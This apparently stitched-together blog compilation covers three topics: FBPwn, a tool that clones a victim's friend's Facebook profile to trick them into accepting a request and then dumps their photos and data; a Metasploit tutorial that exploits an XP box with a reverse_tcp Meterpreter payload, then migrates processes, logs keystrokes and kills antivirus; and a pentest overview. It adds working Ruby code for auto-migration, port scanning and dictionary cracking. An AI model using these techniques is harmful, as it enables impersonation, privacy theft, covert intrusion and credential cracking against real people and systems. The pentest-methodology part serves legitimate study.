A cross-platform, Java-based Facebook profile dumper. It sends friend requests to a list of Facebook profiles and polls for the acceptance notification. Once the victim accepts the invitation, it dumps all of their information, photos and friend list to a local folder.
Modules
All modules work on a selected profile URL (we'll call him bob), using a valid authenticated account (we'll call him mallory).
- AddVictimFriends: Requests to add some or all of bob's friends, to increase the chance of bob accepting a future request once he sees that you have friends in common.
- ProfileCloner: A list of all of bob's friends is displayed and you choose one of them (we'll call him andy). FBPwn changes mallory's display picture and basic info to match andy's. This makes it more likely that bob accepts a request from mallory, because he believes he is accepting andy. Eventually bob will realize this is not andy's account, but by then it is probably too late: all his info is already saved for offline checking by mallory.
- CheckFriendRequest: Checks whether mallory is already a friend of bob and, if so, ends execution. If not, the module sends bob a friend request and polls until he accepts. The module does not stop executing until the friend request is accepted.
- DumpFriends: The accessible friends of bob are saved for offline viewing. The output of this module depends on the other modules: if mallory is not yet a friend of bob, the data may not be accessible and nothing is dumped.
- DumpImages: Accessible images (tagged photos and albums) are saved for offline viewing. The same limitation as DumpFriends applies.
- DumpInfo: Accessible basic info is saved for offline viewing. The same limitation as DumpFriends applies.
Welcome to Metasploit Basics Part 3. In this part I will show you a live example of how to own a PC with an exploit and what to do after the Meterpreter session is opened. In short, I will explain Meterpreter.
The beauty of Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system once exploitation occurs. All commands run through Meterpreter also execute within the context of that process, so nothing new shows up in the process list.
Meterpreter is short for Meta-Interpreter. It is one of the advanced payloads available with the MSF. The way to look at Meterpreter is not simply as a payload but as an exploit platform that is executed on the remote system. Meterpreter has its own command shell, which gives the attacker a wide variety of actions that can be executed on the exploited system. In short, Meterpreter helps us overcome the limitations and disadvantages of a single-purpose payload like the adduser payload.
I will be using my host and a virtual machine to demonstrate this so that you can follow along. I will own an XP box from my BackTrack machine with Metasploit. Unfortunately my XP was a patched version, so I chose a client-side exploit that gives a better chance of owning the PC:
msf > use windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set lhost 192.168.56.128    (your IP)
lhost => 192.168.56.128
msf exploit(ms10_046_shortcut_icon_dllloader) > set srvhost 192.168.56.128  (local address to listen on)
srvhost => 192.168.56.128
Now I type exploit and the server starts.
Now it is up to you to do some clever social engineering for the situation you are in. Give the victim the URL the module prints, [*] Using URL : http://192.168.56.128:80/ (this is just my local host-only IP; if you are running BackTrack and Metasploit in a virtual machine your IP will be a private 192.168.x.x address, which may vary). Note: you cannot use this over the internet unless the attacking machine is reachable from outside, i.e. your router forwards the port to it or the machine itself has a public IP; a private address behind NAT is not enough. Have a look here
Within a second this becomes:
OK, now Part 1 and Part 2 have been shown practically. Time for Part 3 to start.
Type sessions to make sure we have an active session. Once we know we have one, type sessions -i followed by the ID number shown next to the session you want to interact with.
We are in the Meterpreter shell now; there is a lot we can do from here.
Let's see the list of available commands in Meterpreter:
meterpreter > help
Core Commands
=============
Command       Description
-------       -----------
? Help menu
background Backgrounds the current session
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
info Displays information about a Post module
interact Interacts with a channel
irb Drop into irb scripting mode
load Load one or more meterpreter extensions
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
use Deprecated alias for 'load'
write Writes data to a channel
Stdapi: File system Commands
============================
Command       Description
-------       -----------
cat           Read the contents of a file to the screen
cd            Change directory
del           Delete the specified file
download      Download a file or directory
edit          Edit a file
getlwd        Print local working directory
getwd         Print working directory
lcd           Change local working directory
lpwd          Print local working directory
ls            List files
mkdir         Make directory
pwd           Print working directory
rm            Delete the specified file
rmdir         Remove directory
search        Search for files
upload        Upload a file or directory
Stdapi: Networking Commands
===========================
Command       Description
-------       -----------
ipconfig      Display interfaces
portfwd       Forward a local port to a remote service
route         View and modify the routing table
Stdapi: System Commands
=======================
Command       Description
-------       -----------
clearev       Clear the event log
drop_token    Relinquishes any active impersonation token.
execute       Execute a command
getpid        Get the current process identifier
getprivs      Attempt to enable all privileges available to the current process
getuid        Get the user that the server is running as
kill          Terminate a process
ps            List running processes
reboot        Reboots the remote computer
reg           Modify and interact with the remote registry
rev2self      Calls RevertToSelf() on the remote machine
shell         Drop into a system command shell
shutdown      Shuts down the remote computer
steal_token   Attempts to steal an impersonation token from the target process
sysinfo       Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command       Description
-------       -----------
enumdesktops  List all accessible desktops and window stations
getdesktop    Get the current meterpreter desktop
idletime      Returns the number of seconds the remote user has been idle
keyscan_dump  Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop  Stop capturing keystrokes
screenshot    Grab a screenshot of the interactive desktop
setdesktop    Change the meterpreters current desktop
uictl         Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command       Description
-------       -----------
record_mic    Record audio from the default microphone for X seconds
webcam_list   List webcams
webcam_snap   Take a snapshot from the specified webcam
Priv: Elevate Commands
======================
Command       Description
-------       -----------
getsystem     Attempt to elevate your privilege to that of local system.
Time won't allow me to explain every function in detail, so I will just go through the ones I use most.
Every time I break into a box I prefer to find out more about it first, so I type
meterpreter > sysinfo
Computer        : SAURAV-79E14E1B
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
Impressive, isn't it?
Next I always migrate to a new process in order to hide myself, and so that the session survives if the exploited process (here the browser) is closed. Be sure to choose something that is always running, such as explorer.exe, or you may get cut off. Type ps to see a list of running processes, then migrate with migrate PID, for example:
meterpreter > migrate 416
[*] Migrating to 416...
[*] Migration completed successfully.
You can also disable the keyboard and the mouse and then re-enable them:
meterpreter > uictl disable keyboard
Disabling keyboard...
meterpreter > uictl disable mouse
Disabling mouse...
meterpreter > uictl enable mouse
Enabling mouse...
meterpreter > uictl enable keyboard
Enabling keyboard...
Now let's see how to sniff keystrokes. The commands in use are keyscan_start, keyscan_dump and keyscan_stop: start the sniffer, dump whatever has been captured so far, and stop it. The sniffer only sees keystrokes delivered to the desktop of the process Meterpreter is living in, which is one more reason to migrate into a process such as explorer.exe first.
I made a very small video demonstrating this.
The networking commands also help us a lot in the game.
When I type ipconfig, Meterpreter shows me all the network interfaces and their IPs:
meterpreter > ipconfig
WAN (PPP/SLIP) Interface
Hardware MAC: 00:5*:45:00:00:00
IP Address  : 5*.1**.1**.2
Netmask     : 255.255.255.255
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address  : 127.0.0.1
Netmask     : 255.0.0.0
VMware Virtual Ethernet Adapter for VMnet1
Hardware MAC: 00:50:56:c5:00:01
IP Address  : 192.168.38.1
Netmask     : 255.255.255.0
VMware Virtual Ethernet Adapter for VMnet8
Hardware MAC: 00:50:56:c0:00:08
IP Address  : 192.168.56.1
Netmask     : 255.255.255.0
Using the system commands: this video demonstrates some of the system commands at work as I download a file, edit it and upload it back into a folder on the victim's computer.
Metasploit also allows you to run scripts on the victim from the Meterpreter shell. Metasploit is written in Ruby, so Ruby scripts work well. A number of scripts are already included with Metasploit, and if you know Ruby you can write your own. I will not cover all the scripts, only some of them:
killav.rb             kills all antivirus processes running on the system
getcountermeasure.rb  kills AVs and firewalls / IDS
gettelnet.rb          opens a telnet server on the target with a username and password
checkvm.rb            checks whether the target is a VM, and version numbers
keylogrecorder.rb     records keystrokes
netenum.rb
search_dwld.rb
winbf.rb
credcollect.rb
hostsedit.rb
remotewinenum.rb
scheduleme.rb
schtasksabuse.rb
wmic.rb
get_local_subnets.rb
migrate.rb
...... more
So let's run some scripts so you understand what game is on.
meterpreter > run killav
[*] Killing Antivirus services on the target
[*] Killing off Monitor.exe
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine
[*] It appears to be physical host.
meterpreter >
P.S. You can pass -h to a script to get its help, e.g. run scraper -h
meterpreter > run keylogrecorder
[*] firefox.exe Process found, migrating into 1812
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf3/logs/keylogrecorder/96.28.86.172_20091221.2422/96.28.86.172_20091221.2422.db
[*] Recording ...
The keystrokes are saved to a database on the attacker's machine for reference at a later date.
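As an added example (not from the original post, and not one of the scripts that ship with Metasploit), here is a small Meterpreter script in the style of migrate.rb that automates the process-selection step from earlier: it lists the target's processes, picks a long-lived host process and migrates into it, falling back to the next choice when the preferred one is missing or is the process we are already in. The file name smart_migrate.rb, the scripts/meterpreter location and the preference list of host process names are assumptions; the process table it runs against outside a session is constructed for the demonstration.

```ruby
# Added example, not part of the original post and not a script bundled with
# Metasploit. Saved as smart_migrate.rb under the scripts/meterpreter directory
# of your install (assumed location) it runs as "run smart_migrate" inside a
# session; run with plain ruby it exercises the selection logic against a
# constructed process table instead.

# Host processes to try, most stable first. These names are an assumption
# about what is normally running on a Windows XP desktop; explorer.exe is the
# usual choice because it lives as long as the user's session does.
PREFERRED_HOSTS = %w[explorer.exe winlogon.exe svchost.exe].freeze

# Pick a migration target from an array of process hashes shaped like those
# client.sys.process.get_processes returns ('pid', 'name', 'arch', 'user').
# Skips the process we are already in, requires a matching architecture, and
# prefers a process owned by the same user (crossing users needs privileges
# we may not have yet). Returns nil when nothing suitable is running.
def choose_migration_target(procs, current_pid:, user: nil, arch: 'x86')
  candidates = procs.reject { |p| p['pid'] == current_pid }
  PREFERRED_HOSTS.each do |name|
    matches = candidates.select do |p|
      p['name'].to_s.casecmp?(name) && (p['arch'].nil? || p['arch'] == arch)
    end
    same_user = matches.select { |p| user.nil? || p['user'] == user }
    pick = (same_user.empty? ? matches : same_user).min_by { |p| p['pid'] }
    return pick if pick
  end
  nil
end

# Constructed process table standing in for the output of `ps`.
SAMPLE_PROCS = [
  { 'pid' => 4,    'name' => 'System',       'arch' => 'x86', 'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 416,  'name' => 'winlogon.exe', 'arch' => 'x86', 'user' => 'NT AUTHORITY\\SYSTEM' },
  { 'pid' => 1180, 'name' => 'explorer.exe', 'arch' => 'x86', 'user' => 'XPBOX\\bob' },
  { 'pid' => 1812, 'name' => 'firefox.exe',  'arch' => 'x86', 'user' => 'XPBOX\\bob' },
  { 'pid' => 2040, 'name' => 'iexplore.exe', 'arch' => 'x86', 'user' => 'XPBOX\\bob' }
].freeze

if defined?(client) && client
  # Inside a Meterpreter session: real stdapi calls. The 'x86' default arch
  # matches the x86/win32 Meterpreter shown by sysinfo above (an assumption).
  me     = client.sys.process.getpid
  user   = client.sys.config.getuid
  target = choose_migration_target(client.sys.process.get_processes,
                                   current_pid: me, user: user)
  if target
    print_status("Migrating from #{me} to #{target['name']} (#{target['pid']})")
    client.core.migrate(target['pid'])
    print_status('Migration completed successfully')
  else
    print_error('No suitable host process found')
  end
else
  # Stand-alone demonstration against the constructed table.
  target = choose_migration_target(SAMPLE_PROCS, current_pid: 2040, user: 'XPBOX\\bob')
  puts "would migrate 2040 -> #{target['name']} (#{target['pid']})"
end
```

The same-user preference matters in practice: migrating into a SYSTEM-owned process such as winlogon.exe from a plain user session fails until you have elevated (getsystem), so the script only falls back to it when no suitable process of the current user exists.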
You can try the rest of the commands on your own. Time and Blogger won't permit me to explain more, because this post has already become a long one. Any suggestions or praise are welcome.
---kudos to rapid7 community for such a good tool metasploit.---
This article is intended to give you basic knowledge and an understanding of the fundamentals of penetration testing.
Goal of this Article
• An overview of how Vulnerability Assessment (VA) and Penetration Testing (PT) are done
• Defining the scope of the assessment
• Types of Penetration Testing
• A brief understanding of how a buffer overflow works
• How vulnerabilities are scanned for and exploited
• What the end results are
• What a Penetration Testing report should contain
Differentiating VA and PT
Vulnerability Assessment (VA)
In this case the security auditor only has to scan the server or application for vulnerabilities and filter the false positives out of the scan output by mapping the findings against the actual vulnerabilities associated with the target host.
VA Scope Includes:
• The VA can be done both internally and externally
• No vulnerabilities are exploited
• No dangerous attacks such as DoS or buffer overflow attacks are used
• Automated vulnerability scanning tools like Nessus, Retina or ISS are used
Penetration Testing (PT)
In this case the security auditor (penetration tester) not only has to scan the server or application for vulnerabilities but also has to exploit them to gain access to the remote server.
PT Scope Includes:
• The PT is done both internally and externally
• Vulnerabilities are exploited
• Dangerous attacks such as DoS and buffer overflow attacks are used, depending on the customer's willingness to allow them
• Automated vulnerability scanning tools as well as exploits are used
Types Of Penetration Testing
Black Box Penetration Testing
• The pen tester has no previous knowledge of the remote network
• Simulates a real-world attack by a hacker who has no knowledge of the remote network environment (e.g. operating system, running applications, device types, network topology)
White Box Penetration Testing
• The pen tester has knowledge of the remote network, for example:
• Network devices (i.e. Cisco gear, TCP/IP)
• Web server details (i.e. Apache/*nix or Apache/Win2k)
• Operating system type (i.e. Windows/*nix)
• Database platform (i.e. Oracle or MS SQL)
• Load balancers (i.e. Alteon)
• Firewalls (i.e. Cisco PIX), etc.
• Simulates an attack by a hacker who has detailed knowledge of the remote network environment
Scope Of Penetration Testing
Non-Destructive Test
• Scan the remote hosts for possible vulnerabilities
• Analyze and confirm the findings
• Map the vulnerabilities to the proper exploits
• Exploit the remote system with care to avoid disruption of service
• No highly critical Denial of Service (DoS) attack is tried
Destructive Test
• Scan the remote hosts for possible vulnerabilities
• Analyze and confirm the findings
• Map the vulnerabilities to the proper exploits
• All highly critical Denial of Service (DoS) attacks (e.g. buffer overflows) are tried
~~~ Moving On To Penetration Testing ~~~
Penetration testing consists of the following steps:
• Fingerprinting or Footprinting
• Network Information Gathering
• Surveying / Network Mapping
• Port Scanning and Services Identification
• Evading Firewall Rules
• Automated Vulnerability Scanning
• Exploiting Services for Known Vulnerabilities
• Exploiting Web-Based Authorization
• Password Cracking / Brute Forcing
• Denial of Service (DoS) Testing
• Escalation of Privileges
FLOW CHART
1. Information Gathering
This is the first step of any remote host penetration test. Here the pen tester tries to gather as much information as possible about the remote host in order to focus the attack.
Expected Results:
• Zone transfer information
• Domain registration information
• Email IDs
• IP address range
Sample Screenshot (Server queried for Zone-Transfer Info):
(Information Gathered from Zone-Transfer Info)
2. Footprinting / Fingerprinting
In this step, information such as the web server and OS type running on the remote host is gathered to further focus the attack.
3. Surveying / Network Mapping
A network survey often serves as an introduction to the systems to be tested. It is best defined as a combination of data collection, information gathering and policy control.
Expected Results:
• Firewall / router / IDS discovery
• Possible local network / subnet discovery
• IP address range
• Network topology mapping
• ISP information
Sample Screenshot (Local address of the remote network discovered):
4. Port Scanning & Services Identification
Port scanning is the invasive probing of system ports at the transport and network level. The aim of this step is to enumerate live or accessible Internet services, as well as to get past the firewall to find additional live systems.
Expected Results:
• Open, closed or filtered ports (open: the service answers; closed: the host answers with a reset; filtered: nothing answers, so a firewall is dropping the probe)
• Service identification
Sample Screenshot (NMAP port scan output):
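The following is an added example, not part of the original article: a small TCP connect scanner in Ruby that classifies each port as open, closed or filtered by how the connection attempt ends, and reads the banner of open ports to identify the service. It is not a substitute for Nmap; it shows the logic behind the three port states and behind banner-based service identification. The banner signature table and the loopback test service it scans are constructed for the example.

```ruby
require 'socket'

# Banner patterns used to label an open port. Constructed for this example;
# a real scanner carries thousands of these (Nmap's nmap-service-probes).
BANNER_SIGNATURES = {
  /\ASSH-/            => 'ssh',
  /\A220 .*ftp/i      => 'ftp',
  /\A220 .*smtp/i     => 'smtp',
  /\AHTTP\/\d/        => 'http',
  /\A\* OK .*IMAP/i   => 'imap'
}.freeze

def identify_service(banner)
  return 'unknown' if banner.nil? || banner.empty?
  BANNER_SIGNATURES.each { |re, name| return name if banner.match?(re) }
  'unknown'
end

# Read whatever the service volunteers in its first bytes. SSH, FTP, SMTP and
# IMAP speak first; HTTP waits for a request, so its banner stays nil here.
def grab_banner(sock, timeout)
  return nil unless IO.select([sock], nil, nil, timeout)
  data = sock.read_nonblock(512, exception: false)
  data.is_a?(String) ? data.strip : nil
rescue IOError, SystemCallError
  nil
end

# Full TCP connect to one port. The three outcomes map onto Nmap's states:
#   handshake completes        -> open
#   RST (connection refused)   -> closed
#   no answer before timeout   -> filtered (a firewall dropped the SYN)
def probe_port(host, port, connect_timeout, banner_timeout)
  sock = Socket.tcp(host, port, connect_timeout: connect_timeout)
  { state: :open, banner: grab_banner(sock, banner_timeout) }
rescue Errno::ECONNREFUSED
  { state: :closed, banner: nil }
rescue Errno::ETIMEDOUT, Errno::EHOSTUNREACH, Errno::ENETUNREACH
  { state: :filtered, banner: nil }
ensure
  sock&.close
end

# Scan a list of ports on one host; returns port => { state:, banner: }.
def scan_ports(host, ports, connect_timeout: 1.0, banner_timeout: 0.5)
  ports.each_with_object({}) do |port, results|
    results[port] = probe_port(host, port, connect_timeout, banner_timeout)
  end
end

# Constructed target so the example runs offline: a loopback listener that
# greets every client with a fake SSH banner, standing in for a real service.
def start_fake_service(banner)
  server = TCPServer.new('127.0.0.1', 0)
  Thread.new do
    begin
      loop do
        conn = server.accept
        conn.write(banner)
        conn.close
      end
    rescue IOError, SystemCallError
      nil # server closed: the thread ends
    end
  end
  [server, server.addr[1]]
end

if $PROGRAM_NAME == __FILE__
  server, open_port = start_fake_service("SSH-2.0-OpenSSH_5.3\r\n")
  scan_ports('127.0.0.1', [open_port, 1], connect_timeout: 0.5).each do |port, r|
    puts format('%5d/tcp  %-8s %s', port, r[:state], identify_service(r[:banner]))
  end
  server.close
end
```

Against a real target, a host whose every port reports filtered tells you as much as an open port does: the probe never reached the host's TCP stack, which is the situation the firewall evasion step that follows is meant to get around.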
5. Evading Firewall Rules
In this phase, firewall evasion techniques are used to bypass firewall rules. This can further help with port scanning, remote host detection and remote network discovery.
Expected Results:
• Mapping of the firewall's configuration rules
• Partial access to devices behind the firewall
Sample Screenshot: (Trace route using UDP packets)
It is clear from the two screenshots that the packet filtering device (i.e. firewall / router) is not configured to block UDP packets.
6. Automated Vulnerability Scanning
The focus of this step is identifying, understanding and verifying the weaknesses, misconfigurations and vulnerabilities associated with the remote host. The scanning is done with automated tools or scripts to speed up the process.
Expected Results:
• List of vulnerabilities associated with each remote service
• List of possible denial of service vulnerabilities
• Possible misconfigurations on the remote server
Sample Screenshot
What is MVS?
MVS is an automated Internet vulnerability scanner which scans for web-based vulnerabilities (e.g. CGI / IIS Unicode) associated with a remote host running a web server. The scanner output shown indicates that the target host is vulnerable to the IIS Unicode (directory traversal) flaw; the vulnerable string is highlighted in the screenshot below.
7. Exploiting Services For Known Vulnerabilities
This is the most important phase of a penetration test. Here the weaknesses found in the remote services are exploited using publicly available exploits, or self-developed or customized exploits.
Web application flaws are exploited in the same phase to gain access to restricted information: web-based authentication is bypassed using XSS (Cross-Site Scripting), SQL injection or MITM (Man-in-the-Middle) attacks, etc.
Expected Results:
• Access to restricted / confidential information
• Control over the web configuration
• Can also lead to gaining access to other servers
Sample Screenshot (SQL injection used to gain access to the admin page):
8. Password Cracking or Brute Forcing
Password cracking is the process of validating password strength through the use of automated password recovery tools that expose the use of weak passwords due to human factors.
Password lists and word lists are used to validate the passwords in this process: every entry, plus the variations people actually type, is tried against the captured password hashes.
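An added example, not the article's own: a dictionary attack in Ruby that shows how a word list plus simple mangling rules is run against captured password hashes, and why a per-user salt makes the work grow with the number of accounts. The word list, the sample accounts and their hashes are constructed; unsalted MD5 and salted SHA-256 stand in for whatever hash format the target actually stores.

```ruby
require 'digest'

# Word list, constructed for this example. A real run uses a large list such
# as rockyou.txt plus the site-specific words picked up during information
# gathering (company name, product names, local sports teams).
WORDLIST = %w[password letmein dragon welcome admin].freeze

# Mangling rules applied to every word, in the spirit of a John the Ripper
# rule set: case variants crossed with the suffixes people actually append.
SUFFIXES = ['', '1', '123', '!', '2009'].freeze

def mangle(word)
  [word, word.capitalize, word.upcase].product(SUFFIXES).map { |w, s| w + s }.uniq
end

# Dictionary attack on unsalted MD5 hashes. Each candidate is hashed once and
# looked up against every target at the same time: one computation serves all
# accounts, which is exactly why unsalted storage is weak.
# targets maps user => hex MD5 of the password.
def crack_unsalted(targets, wordlist)
  by_hash = {}
  targets.each { |user, digest| (by_hash[digest] ||= []) << user }
  found = {}
  wordlist.each do |word|
    mangle(word).each do |cand|
      by_hash.fetch(Digest::MD5.hexdigest(cand), []).each { |u| found[u] = cand }
      return found if found.size == targets.size
    end
  end
  found
end

# With a per-user salt the shared lookup is gone: every candidate has to be
# hashed once per account, so the cost scales with the number of targets.
# targets maps user => [salt, hex SHA-256 of salt + password].
def crack_salted(targets, wordlist)
  candidates = wordlist.flat_map { |w| mangle(w) }
  targets.each_with_object({}) do |(user, (salt, digest)), found|
    hit = candidates.find { |c| Digest::SHA256.hexdigest(salt + c) == digest }
    found[user] = hit if hit
  end
end

# Constructed sample accounts.
SAMPLE_UNSALTED = {
  'alice' => Digest::MD5.hexdigest('Password1'),
  'bob'   => Digest::MD5.hexdigest('letmein123'),
  'carol' => Digest::MD5.hexdigest('Tr0ub4dor&3') # not derivable from the list
}.freeze

SAMPLE_SALTED = {
  'dave' => ['s4lt', Digest::SHA256.hexdigest('s4lt' + 'welcome!')]
}.freeze

if $PROGRAM_NAME == __FILE__
  crack_unsalted(SAMPLE_UNSALTED, WORDLIST).each { |u, p| puts "#{u}: #{p}" }
  crack_salted(SAMPLE_SALTED, WORDLIST).each { |u, p| puts "#{u}: #{p}" }
end
```

Notice that carol is never cracked: the attack only finds passwords that the list and rules can generate, so a report should state which list and rules were used rather than claim the uncracked accounts are strong.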
9. Denial of Service (DoS) Testing
Denial of Service (DoS) is a situation where the applications or services running on the remote system stop functioning, preventing authenticated network users or devices from accessing them.
Expected Results:
• Disruption of services
• List of other possible DoS vulnerabilities associated with the systems
• Sabotage of the remote network
Sample Screenshot (DoS attack against Cisco):
10. Escalation of Privileges
Escalation of privileges refers to the level of rights the attacker gains over the remote system. It is the final stage of remote host hacking, where the attacker gains complete control over the remote system.
Expected Results:
• Gain administrator / super user rights
• Gain the privilege to retrieve or modify confidential data